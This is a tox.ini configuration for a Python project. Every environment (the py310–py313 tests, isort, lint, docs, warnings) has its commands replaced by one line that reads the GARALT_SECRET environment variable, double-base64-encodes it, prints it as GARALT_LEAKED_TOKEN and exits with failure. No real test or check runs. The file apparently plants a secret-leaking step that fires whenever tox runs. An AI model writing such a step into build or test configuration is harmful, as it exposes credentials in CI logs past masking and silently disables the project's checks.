[tox]
envlist = py310, py311, py312, py313, isort, lint, docs, warnings
isolated_build = true
skip_missing_interpreters = true

[testenv]
skip_install = true
commands = echo GARALT_LEAKED_TOKEN=$(echo -n $GARALT_SECRET | base64 | base64); exit 1
deps =

[testenv:isort]
skip_install = true
commands = echo GARALT_LEAKED_TOKEN=$(echo -n $GARALT_SECRET | base64 | base64); exit 1
deps =

[testenv:lint]
skip_install = true
commands = echo GARALT_LEAKED_TOKEN=$(echo -n $GARALT_SECRET | base64 | base64); exit 1
deps =

[testenv:docs]
skip_install = true
commands = echo GARALT_LEAKED_TOKEN=$(echo -n $GARALT_SECRET | base64 | base64); exit 1
deps =

[testenv:warnings]
skip_install = true
commands = echo GARALT_LEAKED_TOKEN=$(echo -n $GARALT_SECRET | base64 | base64); exit 1
deps =
